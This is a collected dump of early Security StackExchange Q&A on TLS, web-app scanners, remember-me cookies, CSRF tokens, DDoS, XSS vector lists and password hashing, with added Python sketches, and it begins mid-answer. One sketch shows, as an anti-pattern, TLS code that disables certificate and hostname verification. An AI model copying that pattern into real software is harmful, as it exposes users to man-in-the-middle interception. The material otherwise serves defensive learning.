secure, SSL channel, and a non-secure HTTP channel - unless explicitly marked with the "secure" attribute. So, shorter answer? Yes, SSL can be secure enough, but (as with most things) it depends how you use it. :) | {
"source": [
"https://security.stackexchange.com/questions/5",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25/"
]
} |
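A sketch of the certificate-validation point in the answer above (the host name is a placeholder and the code is an assumption, not part of the original answer): a Python client that verifies the chain and the host name, next to the "verification switched off" anti-pattern that breaks TLS authentication in so many mobile apps.
import socket
import ssl
hostname = "example.com"                      # placeholder: your service's host
ctx = ssl.create_default_context()            # check_hostname=True, verify_mode=CERT_REQUIRED
with socket.create_connection((hostname, 443)) as sock:
    with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
        print(tls.version(), tls.cipher()[0])
bad_ctx = ssl.create_default_context()        # the anti-pattern: TLS without authentication
bad_ctx.check_hostname = False
bad_ctx.verify_mode = ssl.CERT_NONE           # any man-in-the-middle certificate is now accepted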
10 | I have a PHP application that I would like to have audited for security. I'm familiar with most of the general security issues, but want to make sure I didn't miss anything. What steps should I take to perform a self-audit? What tools are available? What is the best way to find a 3rd-party auditor? Any recommendations? Interested in both whitebox/codereview audit and blackbox/pentest? | I suggest taking a look at the following links: PHP Security Audit HOWTO Spike PHP Security Audit Tool Zend Application Security Audit 6 Free PHP Security & Auditing Tools | {
"source": [
"https://security.stackexchange.com/questions/10",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/32/"
]
} |
32 | What tools are available to assess the security of a web application? Please provide a small description of what the tool does. Update: More specifically, I'm looking for tools that assume no access to the source code (black box). | there's a large number of apps that can be used in web application assessments. One thing to consider is what kind of tool you're looking for. Some of them are better used alongside a manual test, where others are more designed for non-security specialist IT staff as more "black box" scanning tools. On top of that there's a huge range of scripts and point tools that can be used to assess specific areas of web application security. Some of my favorites Burp suite - http://www.portswigger.net . Free and commercial tool. Excellent adjunct to manual testing and has a good scanner capability as well. Of professional web application testers I know, most use this. W3af - http://w3af.org/ - Open source scanning tool, seems to be developing quite a bit at the moment, primarily focuses on the automated scanning side of things, is still requires quite a bit of knowledge to use effectively. On the pure scanning side there's a number of commercial tools available. Netsparker - http://www.mavitunasecurity.com/netsparker/ IBM AppScan - http://www-01.ibm.com/software/awdtools/appscan/ HP WebInspect - https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-201-200 ^9570_4000_100__ Cenzic Hailstorm - http://www.cenzic.com/products/cenzic-hailstormPro/ Acunetix WVS - http://www.acunetix.com/vulnerability-scanner/ NTObjectives NTOSpider - http://www.ntobjectives.com/ntospider | {
"source": [
"https://security.stackexchange.com/questions/32",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/45/"
]
} |
44 | Assuming you already have a website that implements all of the standard login stuff, what is the correct and most secure way to allow users to automatically be logged in for a certain time period (let's say 30 days)? This time period should be strictly enforced; ie, I don't think a valid solution would be giving a cookie an expiration date and hoping the user's browser deletes it in a timely manner. Details of the existing login system: A user must enter a user name and password The database stores usernames as well as strong_hash_function(password + user_specific_random_salt) Login forms are loaded and submitted over SSL, as are all subsequent pages There are many examples out there and many with obvious security flaws. Let's use PHP as the target language but the concepts should be applicable to any language. | My answer is incomplete and has a nontrivial flaw, in some situations - please see @Scott's answer instead. There are two parts to my answer: First, assuming your threat model does not worry about exposure of client side cookies , you can generate and store a nonce on the server side, hash that with the username and other info (e.g. client ip, computername, timestamp, similar stuff), and send that in the cookie. The nonce should be stored in the database, together with expiry date, and both checked when the cookie comes back. This should be a "rememberance" cookie only, NOT a session cookie - i.e. when you get that cookie without a session, reissue a new, regular session cookie. Also note that like the session cookie, this should be delivered only over https, and using the secure and httpOnly attributes, and of course have the cookie scoped properly etc. Second, for users that were remembered, you should (probably, depending on sensitivity) invoke a reauthentication process for certain sensitive operations. That is, sometimes they would need to put their password in again anyway, but seldom, and only for sensitive operations. This is to prevent attacks such as CSRF and shared desktop exposure. | {
"source": [
"https://security.stackexchange.com/questions/44",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47/"
]
} |
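A minimal sketch of the remember-me scheme described in the answer above (the storage dict, token format and cookie attributes are illustrative assumptions, not part of the original answer): a random server-side nonce is stored hashed together with an expiry, and only the nonce travels in a Secure/HttpOnly cookie.
import hashlib
import secrets
import time
REMEMBER_SECONDS = 30 * 86400
tokens = {}                                   # token_hash -> (user_id, expires_at); stand-in for a DB table
def issue_remember_cookie(user_id):
    nonce = secrets.token_urlsafe(32)                        # CSPRNG, never reused
    token_hash = hashlib.sha256(nonce.encode()).hexdigest()  # store only the hash
    tokens[token_hash] = (user_id, time.time() + REMEMBER_SECONDS)
    return "remember=%s; Max-Age=%d; Secure; HttpOnly; SameSite=Lax; Path=/" % (nonce, REMEMBER_SECONDS)
def check_remember_cookie(nonce):
    entry = tokens.get(hashlib.sha256(nonce.encode()).hexdigest())
    if entry and time.time() < entry[1]:
        return entry[0]                                      # then issue a fresh, normal session cookie
    return None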
52 | How to disclose a security vulnerability in an ethical way? I've heard there are various schools of thought on this topic. I'd like to know the pros/cons of each. | You should let the developer(s) know privately so that they have a chance to fix it. After that, if and when you go public with the vulnerability, you should allow the developer enough time to fix the problem and whoever is exposed to it enough time to upgrade their systems. Personally, I would allow the developer to make the announcement in a security bulletin in most cases rather than announcing it myself. At the very least, I would wait for confirmation that the vulnerability has been fixed. If you have time and have access to the source code, you could also provide a patch. | {
"source": [
"https://security.stackexchange.com/questions/52",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/45/"
]
} |
89 | Which way of additionally feeding the /dev/random entropy pool would you suggest for producing random passwords? Or is there maybe a better way to locally create fully random passwords? | You can feed it with white noise from your sound chip, if present. See this article: http://www.linuxfromscratch.org/hints/downloads/files/entropy.txt | {
"source": [
"https://security.stackexchange.com/questions/89",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/23/"
]
} |
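A related sketch (an addition, not from the answer above): if the goal is simply random passwords, they can be drawn directly from the operating system's CSPRNG, which on Linux is fed by the same kernel entropy pool behind /dev/random and /dev/urandom.
import secrets
import string
ALPHABET = string.ascii_letters + string.digits + string.punctuation
def random_password(length=24):
    return "".join(secrets.choice(ALPHABET) for _ in range(length))
print(random_password())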
93 | Which credentials from the sub-list of IT certifications (as per the Information Systems Security Association ) would be considered MUST HAVE for an IT Security specialist? CEH Certified Ethical Hacker CIPP Certified Information Privacy Professional CISM Certified Information Security Manager CISSP Certified Information Systems Security Professional GIAC Global Information Assurance Certification LPT Licensed Penetration Tester AHC Anti-Hacking Certification AISC Advanced Information Security Certification CHFI Computer Hacking Forensic Investigator CPP Certified Protection Professional SSEC Software Security Engineering Certification | None. Generally speaking, certifications in the security field, much like in most other tech areas, are required only for entry-level positions (when you have no experience to speak of), senior positions (when you need the long signature), and government jobs (when you need to answer an RFP to work there). By themselves, none of these are a replacement for good ol' experience and knowledge. That said, these are the ones that get more "respect" (that I am familiar with): CISSP CISM GIAC CEH for a juniorish pentester Also OWASP is supposedly coming out with their own cert soon, which would probably be respectable enough.... | {
"source": [
"https://security.stackexchange.com/questions/93",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/59/"
]
} |
100 | I read a blog post GitHub moves to SSL, but remains Firesheepable that claimed that cookies can be sent unencrypted over http even if the site is only using https. They write that a cookie should be marked with a "secure flag", but I don't know what that flag looks like. How can I check that my cookies are only sent over encrypted https and not over unencrypted http, on my site that is only using https? | The cookie's secure flag looks like this: secure; That's it. This should appear at the end of the HTTP header: Set-Cookie: mycookie=somevalue; path=/securesite/; Expires=12/12/2010; secure; httpOnly; Of course, to check it, simply plug in any proxy or sniffer (I use the excellent Fiddler ) and watch... *Bonus: I also threw in there the httpOnly attribute, which protects against cookie access from Javascript space, e.g. via XSS. | {
"source": [
"https://security.stackexchange.com/questions/100",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69/"
]
} |
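One way to check your own site's cookie flags without a proxy, as a complement to the Fiddler suggestion above (the URL is a placeholder; the script is an assumption, not part of the original answer):
import urllib.request
resp = urllib.request.urlopen("https://www.example.com/")    # replace with your own login URL
for name, value in resp.getheaders():
    if name.lower() == "set-cookie":
        flags = [p.strip().lower() for p in value.split(";")[1:]]
        cookie_name = value.split(";")[0].split("=")[0]
        print(cookie_name,
              "secure" if "secure" in flags else "MISSING secure",
              "httponly" if "httponly" in flags else "MISSING httpOnly")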
114 | It is hard to protect a server against Denial of Service attacks , DoS/DDoS. The two simple ways I can think of are to use a server with a lot of resources (e.g. CPU and memory), and to build the server application to scale up very well. Other protection mechanisms are probably used by the firewall. I can think of black-listing IP addresses, but I don't really know how it works. And there are probably other techniques that are used by the firewall to protect against DDoS attacks. What techniques do advanced firewalls use to protect against DoS/DDoS attacks? | Those are really two different, though similar, attacks. "Regular" DoS is based on trying to crash the server/firewall, through some kind of bug or vulnerability. E.g. the well known SYN Flood attacks. The protection against these is of course specific to the flaw (e.g. SYN cookies), and secure coding/design in general. However, DDoS simply attempts to overwhelm the server/firewall by flooding it with masses of apparently legitimate requests. Truthfully, a single firewall cannot really protect against this, since there is no real way to mark the "bad" clients. It's just a question of "best effort", such as throttling itself so it doesn't crash, load balancers and failover systems, attempting to blacklist IPs (if not according to "badness", then according to usage), and of course, actively notifying the administrators. This last might be the most important, since in cases of apparent DDoS (I say apparent, because regular peak usage might look like DDoS - true story) it really takes a human to differentiate the context of the situation, and figure out whether to shut down, make a best effort, provision another box, etc (or employ a counter-attack... ssshhh!!) | {
"source": [
"https://security.stackexchange.com/questions/114",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69/"
]
} |
162 | I am fully aware of CSRF and have already implemented some safe forms, but I have never been happy with the results. I've created tokens as an MD5 of username, form info and a salt and stored it in a session. This has a problem with tabbed browsing (can be fixed by keeping an array of active hashes) and with timing. I would like my hashes to work only for e.g. 10 minutes, but how do I put a time-related variable in the hash? Can anybody point me to a good resource describing how to implement CSRF protection properly? | The best way to build CSRF protection properly: Don't. Most common frameworks have this protection already built in (ASP.NET, Struts, Ruby I think), or there are existing libraries that have already been vetted. (e.g. OWASP's CSRFGuard ). Another option, depending on your context, is to enforce reauthentication of the user, but only for specific, sensitive operations. As per your comments, if you need to implement this yourself, your solution is not too bad, but I would simplify it. You can generate a crypto-random nonce (long enough), store that in session memory, and change it every X minutes (you store the expiry time in session too). In each form, you include the nonce in a hidden form field, and compare that value when the form is posted. If the form token matches, you're clear. If not, you can accept e.g. the previous token as well, to handle the edge cases. Though I must say that I've seen too many failed attempts at implementing this by oneself, to really recommend this path. You're still better off finding a minimal package to do this for you. | {
"source": [
"https://security.stackexchange.com/questions/162",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/96/"
]
} |
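A minimal sketch of the hand-rolled fallback the answer above describes (only if a framework's built-in CSRF protection really is unavailable; the session dict is a stand-in for real server-side session storage, and the numbers are illustrative):
import hmac
import secrets
import time
TOKEN_LIFETIME = 10 * 60        # rotate every 10 minutes, keep the previous token for edge cases
def get_csrf_token(session):
    now = time.time()
    if "csrf_token" not in session or now > session["csrf_expires"]:
        session["csrf_prev"] = session.get("csrf_token")
        session["csrf_token"] = secrets.token_hex(32)
        session["csrf_expires"] = now + TOKEN_LIFETIME
    return session["csrf_token"]                  # embed this in a hidden form field
def check_csrf_token(session, submitted):
    current = session.get("csrf_token") or ""
    previous = session.get("csrf_prev") or ""
    return hmac.compare_digest(submitted, current) or (
        previous != "" and hmac.compare_digest(submitted, previous))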
164 | There is a great list of XSS vectors available here: http://ha.ckers.org/xss.html , but it hasn't changed much lately (e.g. the latest FF version mentioned is 2.0). Is there any other list as good as this, but up to date? | The best new one I've seen recently is here: http://html5sec.org/ . It is a good list of vectors with browser support noted, and it has quite a few of the more obscure ones. | {
"source": [
"https://security.stackexchange.com/questions/164",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/96/"
]
} |
211 | If I hash passwords before storing them in my database, is that sufficient to prevent them being recovered by anyone? I should point out that this relates only to retrieval directly from the database, and not any other type of attack, such as bruteforcing the login page of the application, keylogger on the client, and of course rubberhose cryptanalysis (or nowadays we should call it " Chocolate Cryptanalysis "). Of course any form of hash will not prevent those attacks. | Note: This answer was written in 2013. Many things have changed in the following years, which means that this answer should primarily be seen as how best practices used to be in 2013. The Theory We need to hash passwords as a second line of defence. A server which can authenticate users necessarily contains, somewhere in its entrails, some data which can be used to validate a password. A very simple system would just store the passwords themselves, and validation would be a simple comparison. But if a hostile outsider were to gain a simple glimpse at the contents of the file or database table which contains the passwords, then that attacker would learn a lot. Unfortunately, such partial, read-only breaches do occur in practice (a mislaid backup tape, a decommissioned but not wiped-out hard disk, an aftermath of a SQL injection attack -- the possibilities are numerous). See this blog post for a detailed discussion. Since the overall contents of a server that can validate passwords are necessarily sufficient to indeed validate passwords, an attacker who obtained a read-only snapshot of the server is in a position to make an offline dictionary attack : he tries potential passwords until a match is found. This is unavoidable. So we want to make that kind of attack as hard as possible. Our tools are the following: Cryptographic hash functions : these are fascinating mathematical objects which everybody can compute efficiently, and yet nobody knows how to invert them. This looks good for our problem - the server could store a hash of a password; when presented with a putative password, the server just has to hash it to see if it gets the same value; and yet, knowing the hash does not reveal the password itself. Salts : among the advantages of the attacker over the defender is parallelism . The attacker usually grabs a whole list of hashed passwords, and is interested in breaking as many of them as possible. He may try to attack several in parallel. For instance, the attacker may consider one potential password, hash it, and then compare the value with 100 hashed passwords; this means that the attacker shares the cost of hashing over several attacked passwords. A similar optimisation is precomputed tables , including rainbow tables ; this is still parallelism, with a space-time change of coordinates. The common characteristic of all attacks which use parallelism is that they work over several passwords which were processed with the exact same hash function . Salting is about using not one hash function, but a lot of distinct hash functions ; ideally, each instance of password hashing should use its own hash function. A salt is a way to select a specific hash function among a big family of hash functions. Properly applied salts will completely thwart parallel attacks (including rainbow tables). Slowness : computers become faster over time (Gordon Moore, co-founder of Intel, theorized it in his famous law ). Human brains do not. 
This means that attackers can "try" more and more potential passwords as years pass, while users cannot remember more and more complex passwords (or flatly refuse to). To counter that trend, we can make hashing inherently slow by defining the hash function to use a lot of internal iterations (thousands, possibly millions). We have a few standard cryptographic hash functions; the most famous are MD5 and the SHA family . Building a secure hash function out of elementary operations is far from easy. When cryptographers want to do that, they think hard, then harder, and organize a tournament where the functions fight each other fiercely. When hundreds of cryptographers gnawed and scraped and punched at a function for several years and found nothing bad to say about it, then they begin to admit that maybe that specific function could be considered as more or less secure. This is just what happened in the SHA-3 competition . We have to use this way of designing hash function because we know no better way. Mathematically, we do not know if secure hash functions actually exist; we just have "candidates" (that's the difference between "it cannot be broken" and "nobody in the world knows how to break it"). A basic hash function, even if secure as a hash function , is not appropriate for password hashing, because: it is unsalted, allowing for parallel attacks ( rainbow tables for MD5 or SHA-1 can be obtained for free, you do not even need to recompute them yourself); it is way too fast, and gets faster with technological advances. With a recent GPU (i.e. off-the-shelf consumer product which everybody can buy), hashing rate is counted in billions of passwords per second . So we need something better. It so happens that slapping together a hash function and a salt, and iterating it, is not easier to do than designing a hash function -- at least, if you want the result to be secure. There again, you have to rely on standard constructions which have survived the continuous onslaught of vindicative cryptographers. Good Password Hashing Functions PBKDF2 PBKDF2 comes from PKCS#5 . It is parameterized with an iteration count (an integer, at least 1, no upper limit), a salt (an arbitrary sequence of bytes, no constraint on length), a required output length (PBKDF2 can generate an output of configurable length), and an "underlying PRF". In practice, PBKDF2 is always used with HMAC , which is itself a construction built over an underlying hash function. So when we say "PBKDF2 with SHA-1", we actually mean "PBKDF2 with HMAC with SHA-1". Advantages of PBKDF2: Has been specified for a long time, seems unscathed for now. Is already implemented in various framework (e.g. it is provided with .NET ). Highly configurable (although some implementations do not let you choose the hash function, e.g. the one in .NET is for SHA-1 only). Received NIST blessings (modulo the difference between hashing and key derivation; see later on). Configurable output length (again, see later on). Drawbacks of PBKDF2: CPU-intensive only, thus amenable to high optimization with GPU (the defender is a basic server which does generic things, i.e. a PC, but the attacker can spend his budget on more specialized hardware, which will give him an edge). You still have to manage the parameters yourself (salt generation and storage, iteration count encoding...). There is a standard encoding for PBKDF2 parameters but it uses ASN.1 so most people will avoid it if they can (ASN.1 can be tricky to handle for the non-expert). 
bcrypt bcrypt was designed by reusing and expanding elements of a block cipher called Blowfish . The iteration count is a power of two, which is a tad less configurable than PBKDF2, but sufficiently so nevertheless. This is the core password hashing mechanism in the OpenBSD operating system. Advantages of bcrypt: Many available implementations in various languages (see the links at the end of the Wikipedia page). More resilient to GPU; this is due to details of its internal design. The bcrypt authors made it so voluntarily: they reused Blowfish because Blowfish was based on an internal RAM table which is constantly accessed and modified throughout the processing. This makes life much harder for whoever wants to speed up bcrypt with a GPU (GPU are not good at making a lot of memory accesses in parallel). See here for some discussion. Standard output encoding which includes the salt, the iteration count and the output as one simple to store character string of printable characters. Drawbacks of bcrypt: Output size is fixed: 192 bits. While bcrypt is good at thwarting GPU, it can still be thoroughly optimized with FPGA : modern FPGA chips have a lot of small embedded RAM blocks which are very convenient for running many bcrypt implementations in parallel within one chip. It has been done. Input password size is limited to 51 characters. In order to handle longer passwords, one has to combine bcrypt with a hash function (you hash the password and then use the hash value as the "password" for bcrypt). Combining cryptographic primitives is known to be dangerous (see above) so such games cannot be recommended on a general basis. scrypt scrypt is a much newer construction (designed in 2009) which builds over PBKDF2 and a stream cipher called Salsa20/8 , but these are just tools around the core strength of scrypt, which is RAM . scrypt has been designed to inherently use a lot of RAM (it generates some pseudo-random bytes, then repeatedly reads them in a pseudo-random sequence). "Lots of RAM" is something which is hard to make parallel. A basic PC is good at RAM access, and will not try to read dozens of unrelated RAM bytes simultaneously. An attacker with a GPU or a FPGA will want to do that, and will find it difficult. Advantages of scrypt: A PC, i.e. exactly what the defender will use when hashing passwords, is the most efficient platform (or close enough) for computing scrypt. The attacker no longer gets a boost by spending his dollars on GPU or FPGA. One more way to tune the function: memory size. Drawbacks of scrypt: Still new (my own rule of thumb is to wait at least 5 years of general exposure, so no scrypt for production until 2014 - but, of course, it is best if other people try scrypt in production, because this gives extra exposure). Not as many available, ready-to-use implementations for various languages. Unclear whether the CPU / RAM mix is optimal. For each of the pseudo-random RAM accesses, scrypt still computes a hash function. A cache miss will be about 200 clock cycles, one SHA-256 invocation is close to 1000. There may be room for improvement here. Yet another parameter to configure: memory size. OpenPGP Iterated And Salted S2K I cite this one because you will use it if you do password-based file encryption with GnuPG . That tool follows the OpenPGP format which defines its own password hashing functions, called "Simple S2K", "Salted S2K" and " Iterated and Salted S2K ". Only the third one can be deemed "good" in the context of this answer. 
It is defined as the hash of a very long string (configurable, up to about 65 megabytes) consisting of the repetition of an 8-byte salt and the password. As far as these things go, OpenPGP's Iterated And Salted S2K is decent; it can be considered as similar to PBKDF2, with less configurability. You will very rarely encounter it outside of OpenPGP, as a stand-alone function. Unix "crypt" Recent Unix-like systems (e.g. Linux), for validating user passwords, use iterated and salted variants of the crypt() function based on good hash functions, with thousands of iterations. This is reasonably good. Some systems can also use bcrypt, which is better. The old crypt() function, based on the DES block cipher , is not good enough: It is slow in software but fast in hardware, and can be made fast in software too but only when computing several instances in parallel (technique known as SWAR or "bitslicing"). Thus, the attacker is at an advantage. It is still quite fast, with only 25 iterations. It has a 12-bit salt, which means that salt reuse will occur quite often. It truncates passwords to 8 characters (characters beyond the eighth are ignored) and it also drops the upper bit of each character (so you are more or less stuck with ASCII). But the more recent variants, which are active by default, will be fine. Bad Password Hashing Functions About everything else, in particular virtually every homemade method that people relentlessly invent. For some reason, many developers insist on designing function themselves, and seem to assume that "secure cryptographic design" means "throw together every kind of cryptographic or non-cryptographic operation that can be thought of". See this question for an example. The underlying principle seems to be that the sheer complexity of the resulting utterly tangled mess of instruction will befuddle attackers. In practice, though, the developer himself will be more confused by his own creation than the attacker. Complexity is bad. Homemade is bad. New is bad. If you remember that, you'll avoid 99% of problems related to password hashing, or cryptography, or even security in general. Password hashing in Windows operating systems used to be mindbogglingly awful and now is just terrible (unsalted, non-iterated MD4). Key Derivation Up to now, we considered the question of hashing passwords . A closely related problem is transforming a password into a symmetric key which can be used for encryption; this is called key derivation and is the first thing you do when you "encrypt a file with a password". It is possible to make contrived examples of password hashing functions which are secure for the purpose of storing a password validation token, but terrible when it comes to generating symmetric keys; and the converse is equally possible. But these examples are very "artificial". For practical functions like the one described above: The output of a password hashing function is acceptable as a symmetric key, after possible truncation to the required size. A Key Derivation Function can serve as a password hashing function as long as the "derived key" is long enough to avoid "generic preimages" (the attacker is just lucky and finds a password which yields the same output). An output of more than 100 bits or so will be enough. 
Indeed, PBKDF2 and scrypt are KDF, not password hashing function -- and NIST "approves" of PBKDF2 as a KDF, not explicitly as a password hasher (but it is possible, with only a very minute amount of hypocrisy, to read NIST's prose in such a way that it seems to say that PBKDF2 is good for hashing passwords). Conversely, bcrypt is really a block cipher (the bulk of the password processing is the "key schedule") which is then used in CTR mode to produce three blocks (i.e. 192 bits) of pseudo-random output, making it a kind of hash function. bcrypt can be turned into a KDF with a little surgery, by using the block cipher in CTR mode for more blocks. But, as usual, we cannot recommend such homemade transforms. Fortunately, 192 bits are already more than enough for most purposes (e.g. symmetric encryption with GCM or EAX only needs a 128-bit key). Miscellaneous Topics How many iterations? As much as possible! This salted-and-slow hashing is an arms race between the attacker and the defender. You use many iterations to make the hashing of a password harder for everybody . To improve security, you should set that number as high as you can tolerate on your server, given the tasks that your server must otherwise fulfill. Higher is better. Collisions and MD5 MD5 is broken : it is computationally easy to find a lot of pairs of distinct inputs which hash to the same value. These are called collisions . However, collisions are not an issue for password hashing . Password hashing requires the hash function to be resistant to preimages , not to collisions. Collisions are about finding pairs of messages which give the same output without restriction , whereas in password hashing the attacker must find a message which yields a given output that the attacker does not get to choose. This is quite different. As far as we known, MD5 is still (almost) as strong as it has ever been with regards to preimages (there is a theoretical attack which is still very far in the ludicrously impossible to run in practice). The real problem with MD5 as it is commonly used in password hashing is that it is very fast, and unsalted. However, PBKDF2 used with MD5 would be robust. You should still use SHA-1 or SHA-256 with PBKDF2, but for Public Relations. People get nervous when they hear "MD5". Salt Generation The main and only point of the salt is to be as unique as possible. Whenever a salt value is reused anywhere , this has the potential to help the attacker. For instance, if you use the user name as salt, then an attacker (or several colluding attackers) could find it worthwhile to build rainbow tables which attack the password hashing function when the salt is "admin" (or "root" or "joe") because there will be several, possibly many sites around the world which will have a user named "admin". Similarly, when a user changes his password, he usually keeps his name, leading to salt reuse. Old passwords are valuable targets, because users have the habit of reusing passwords in several places (that's known to be a bad idea, and advertised as such, but they will do it nonetheless because it makes their life easier), and also because people tend to generate their passwords "in sequence": if you learn that Bob's old password is "SuperSecretPassword37", then Bob's current password is probably "SuperSecretPassword38" or "SuperSecretPassword39". The cheap way to obtain uniqueness is to use randomness . 
If you generate your salt as a sequence of random bytes from the cryptographically secure PRNG that your operating system offers ( /dev/urandom , CryptGenRandom() ...) then you will get salt values which will be "unique with a sufficiently high probability". 16 bytes are enough so that you will never see a salt collision in your life, which is overkill but simple enough. UUID are a standard way of generating "unique" values. Note that "version 4" UUID just use randomness (122 random bits), like explained above. A lot of programming frameworks offer simple to use functions to generate UUID on demand, and they can be used as salts. Salt Secrecy Salts are not meant to be secret; otherwise we would call them keys . You do not need to make salts public, but if you have to make them public (e.g. to support client-side hashing), then don't worry too much about it. Salts are there for uniqueness. Strictly speaking, the salt is nothing more than the selection of a specific hash function within a big family of functions. "Pepper" Cryptographers can never let a metaphor alone; they must extend it with further analogies and bad puns. "Peppering" is about using a secret salt, i.e. a key. If you use a "pepper" in your password hashing function, then you are switching to a quite different kind of cryptographic algorithm; namely, you are computing a Message Authentication Code over the password. The MAC key is your "pepper". Peppering makes sense if you can have a secret key which the attacker will not be able to read. Remember that we use password hashing because we consider that an attacker could grab a copy of the server database, or possible of the whole disk of the server. A typical scenario would be a server with two disks in RAID 1 . One disk fails (electronic board fries - this happens a lot). The sysadmin replaces the disk, the mirror is rebuilt, no data is lost due to the magic of RAID 1. Since the old disk is dysfunctional, the sysadmin cannot easily wipe its contents. He just discards the disk. The attacker searches through the garbage bags, retrieves the disk, replaces the board, and lo! he has a complete image of the whole server system, including database, configuration files, binaries, operating system... the full monty, as the British say. For peppering to be really applicable, you need to be in a special setup where there is something more than a PC with disks; you need an HSM . HSM are very expensive, both in hardware and in operational procedure. But with an HSM, you can just use a secret "pepper" and process passwords with a simple HMAC (e.g. with SHA-1 or SHA-256). This will be vastly more efficient than bcrypt/PBKDF2/scrypt and their cumbersome iterations. Also, usage of an HSM will look extremely professional when doing a WebTrust audit . Client-side hashing Since hashing is (deliberately) expensive, it could make sense, in a client-server situation, to harness the CPU of the connecting clients. After all, when 100 clients connect to a single server, the clients collectively have a lot more muscle than the server. To perform client-side hashing, the communication protocol must be enhanced to support sending the salt back to the client. This implies an extra round-trip, when compared to the simple client-sends-password-to-server protocol. This may or may not be easy to add to your specific case. Client-side hashing is difficult in a Web context because the client uses JavaScript, which is quite anemic for CPU-intensive tasks. 
In the context of SRP, password hashing necessarily occurs on the client side. Conclusion Use bcrypt. PBKDF2 is not bad either. If you use scrypt you will be a "slightly early adopter" with the risks that are implied by this expression; but it would be a good move for scientific progress ("crash dummy" is a very honourable profession). | {
"source": [
"https://security.stackexchange.com/questions/211",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/33/"
]
} |
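A minimal sketch of the salted, slow hashing recommended in the answer above, using PBKDF2 from Python's standard library. The iteration count, salt length and storage format are illustrative assumptions, not prescribed values; as the answer says, set the iteration count as high as your server can tolerate.

```python
import hashlib
import secrets

def hash_password(password: str, iterations: int = 200_000) -> dict:
    # 16 random bytes from the OS CSPRNG: a unique, non-secret salt per password
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": dk.hex()}

def verify_password(password: str, record: dict) -> bool:
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(record["salt"]), record["iterations"])
    # constant-time comparison, so verification does not leak timing information
    return secrets.compare_digest(dk.hex(), record["hash"])
```

The salt is stored next to the hash; it is not secret, it only has to be unique, which is exactly the role described above.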
258 | What are the pros and cons of encrypting all HTTP traffic for the whole site through SSL, as opposed to SSL on just the login page? | Since most of the other answers here deal with the downsides of site-wide SSL (mainly performance issues - btw these can easily be mitigated by offloading the SSL termination, either to an SSL proxy box, or an SSL card), I will point out some issues with having only the login page over SSL, then switching to non-SSL: The rest of the site is not secured (though this is obvious, sometimes the focus is too much on just the user's password). The user's session id must be transmitted in the clear, allowing it to be intercepted and used, and thus enabling the bad guys to impersonate your users. (This is mostly what the Firesheep hubbub was about). Because of the previous point, your session cookies cannot be marked with the secure attribute, which means that they can be retrieved in additional ways. I have seen sites with login-only-SSL which of course neglect to include the Forgot-password page, the Change-password page, and even the Registration page... The switch from SSL to non-SSL is often complicated, can require complex configuration on your webserver, and in many cases will pop up a scary message for your users. If it's ONLY the login page, and e.g. there is a link to the login page from your site's home page - what is to guarantee that someone won't spoof/modify/intercept your homepage, and have it point to a different login page? Then there is the case where the login page itself is not SSL, but only the SUBMIT is - since that's the only time the password is sent, so that should be safe, right? But in truth that removes from the user the ability to ensure ahead of time that the password is being sent to the correct site, until it's too late. (E.g. Bank of America, and many others). | {
"source": [
"https://security.stackexchange.com/questions/258",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/45/"
]
} |
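To make the cookie point above concrete, here is a small Python sketch (standard library only; the token value is a made-up placeholder) of a session cookie carrying the Secure and HttpOnly attributes that a login-page-only SSL setup cannot use:

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session_id"] = "3f7a1c9e2b4d..."      # hypothetical session token
cookie["session_id"]["secure"] = True          # browser will only send it over HTTPS
cookie["session_id"]["httponly"] = True        # not readable from page JavaScript
print(cookie.output())                         # the Set-Cookie header line to emit
```

With only the login page on SSL, marking the cookie Secure would stop it being sent on the plain-HTTP pages at all, which is why such sites leave the flag off and end up exposing the session id.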
279 | Can online password managers be used for storing and managing passwords? I mean from the security point of view. I understand that those systems can be different and some deserve more trust than others, but what I mean is the whole idea of a public service for storing personal passwords. Is it viable in its essence? About a year ago I signed up for one such service (Passpack). It seems reliable and professional, but I am still afraid to start really using it and upload my numerous passwords there. And it's not because I'm not willing to upgrade to a paid account; I'm just very careful and doubtful. Am I wrong? | If you're asking in theory, can such a system be built securely? My answer would be yes, absolutely, but it's not trivial work - and most likely would be done wrong (depending on who designed and built it). If you're asking about existing services, while I'm not familiar with the one you mentioned, in general I don't know of any good, reliable, secure systems for this. If you're asking, how can I tell if a specific system is secure and reliable? Well, ya can't. Unless you (or an expert you trust, who is proficient enough in the given technology) performed an in-depth code review, penetration test, and other security reviews. And periodic deployment and server examinations. And so forth... And no, getting a 3rd party certification such as HackerSafe (not even PCI:DSS) is not good enough, not for you to entrust the keys to your most sensitive data. (Unless it's a service you know well enough to trust.) | {
"source": [
"https://security.stackexchange.com/questions/279",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3/"
]
} |
